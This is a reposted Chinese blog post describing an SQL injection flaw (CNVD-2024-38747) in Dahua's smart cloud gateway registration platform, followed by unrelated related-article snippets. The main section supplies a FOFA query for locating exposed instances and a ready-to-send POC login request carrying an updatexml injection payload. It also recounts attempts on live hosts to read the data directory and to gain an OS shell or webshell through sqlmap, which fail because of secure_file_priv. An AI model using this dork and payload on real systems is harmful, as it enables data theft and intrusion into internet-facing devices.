大华智能云网关注册管理平台SQL注入漏洞

news/2025/1/24 7:20:22/文章来源:https://www.cnblogs.com/LeouMaster/p/18509644

描述

大华智能云网关注册管理平台SQL注入漏洞(CNVD-2024-38747),允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。

fofa

title="智能云网关注册管理平台"

POC

POST /index.php/User/doLogin HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8username=1')and+updatexml(1,concat(0x7e,user(),0x7e),1)--+&password=

漏洞复现

fofa中搜索,共有21条数据匹配

image-20241022103246777

以下为登录页面以及页面特征

image-20241022103311727

image-20241022103654964

该漏洞产生于登录数据包中,输入用户名和密码进行登录,查看登录接口是否为/index.php/User/doLogin,接着将Payload替换到数据包中

image-20241022104315834

很明显存在SQL注入漏洞,尝试通过SQL注入GetShell

前提:知道网站的绝对路径

这个好弄,把Payload中的user()换成@@datadir就可以了

image-20241022104817728

接着使用sqlmap的--os-shell命令,写入一句话命令,但是无任何回显

image-20241022105028056

执行一下ping命令,查看dnslog是否有数据

image-20241022105604061

image-20241022105615690

没有任何数据,--os-shell命令执行失败,猜测可能会是Mysql设置了secure_file_priv

sql注入写入文件还有个前提,就是secure_file_priv允许写入

使用--sql-shell命令执行语句进行查看

image-20241022105934058

能写入的话是没有任何返回的,这里返回了' ',也就无法进行写入了,无法通过写入webshell拿系统权限了

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/823084.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

史上最全 Terraform 入门教程,助你无坑入门!

在云计算的浪潮中,基础设施管理变得越来越复杂。如何高效地配置和管理云资源,成为了每个开发者和运维工程师必须面对的挑战。Terraform,作为一种强大的基础设施即代码(IaC)工具,为我们提供了一种简洁而有效的解决方案。 在这篇博客中,我将深入探讨Terraform的功能与使用…

epoll 或者kqueue 的原理是什么

在处理大规模并发网络连接的领域中,epoll和kqueue代表了两种颠覆性的IO事件通知技术。它们被广泛应用于Linux和BSD系统中,以有效管理和优化网络通信过程。本文旨在深入探究epoll和kqueue的内部工作机制,揭示它们如何优于传统的select和poll方法,并分析其对现代网络编程带来…

PbootCMS禁止数字ID方式访问栏目

修改方法:编辑\apps\home\controller\IndexController.php文件。 将if (! ! $sort && ! $suffix && ! $err)修改为if (! ! $sort && ! $suffix && ! $err && !is_numeric($path))。扫码添加技术【解决问题】专注中小企业网站建设、网…

PbootCMS模板文章列表序号调用标签

文章列表序号调用标签包括:[list:n](从0开始)、[list:i](从1开始)、[list:id](文章编号)。扫码添加技术【解决问题】专注中小企业网站建设、网站安全12年。熟悉各种CMS,精通PHP+MYSQL、HTML5、CSS3、Javascript等。承接:企业仿站、网站修改、网站改版、BUG修复、问题处…

构建数据安全的钢铁长城:500强企业案例分析

飞驰云联作为一家企业数据安全交换解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。特…

JavaScript中reduce()详解及使用方法

reduce()方法接收一个函数做为累加器,数组中的每一个值(从左到右)开始缩减,最终计算为一个值,下面这篇文章主要给大家介绍了关于JavaScript中reduce()详解及使用方法的相关资料,需要的朋友可以参考下reduce(): reduce()方法为归并类方法,最常用的场景就是,计算数组中的每…

Ubuntu 22.04 LTS 在线/离线安装 Docker

Docker 安装方式 准备环境 root@ubuntu2204:~# hostnamectlStatic hostname: ubuntu2204Icon name: computer-vmChassis: vmMachine ID: 06204406df2343f89f6ba6550a356854Boot ID: 3142ea12a9e64adbab7b8939935e7698Virtualization: vmware Operating System: Ubuntu 22.04.5 …

实验4:抽象工厂模式

本次实验属于模仿型实验,通过本次实验学生将掌握以下内容: 1、理解抽象工厂模式的动机,掌握该模式的结构; 2、能够利用抽象工厂模式解决实际问题。[实验任务一]:人与肤色 使用抽象工厂模式,完成下述产品等级结构: 实验要求: 1.画出对应的类图; 2.提交源代码; 3.注意…

PromptKD:视觉语言模型的无监督提示提取

PromptKD:视觉语言模型的无监督提示提取快速学习已成为增强视觉语言模型(VLM)的一种有价值的技术,例如用于特定领域下游任务的CLIP。现有的工作主要集中在设计各种学习形式的提示,忽视了提示作为从大型教师模型中学习的有效蒸馏器的潜力。介绍了一种无监督的领域提示蒸馏框…

el-image图片预览显示bug

原本代码 <el-table-column label="附件" width="120"><template #default="scope"><el-imagev-if="scope.row.attachmentUrl":src="scope.row.attachmentUrl":preview-src-list="[scope.row.attachmen…

《HelloGitHub》第 103 期

兴趣是最好的老师,HelloGitHub 让你对编程感兴趣!简介 HelloGitHub 分享 GitHub 上有趣、入门级的开源项目。github.com/521xueweihan/HelloGitHub这里有实战项目、入门教程、黑科技、开源书籍、大厂开源项目等,涵盖多种编程语言 Python、Java、Go、C/C++、Swift...让你在短…

.NET使用Moq开源模拟库简化单元测试

前言 今天大姚给大家推荐一个.NET开源、流行、使用简单的.NET模拟库:Moq。 Moq类库介绍 Moq是一个.NET开源、流行、使用简单的 .NET 模拟库,充分利用了.NET 的 Linq 表达式树和 lambda 表达式。这使得 Moq 成为最具生产力、类型安全且支持重构的模拟库。它不仅支持模拟接口,…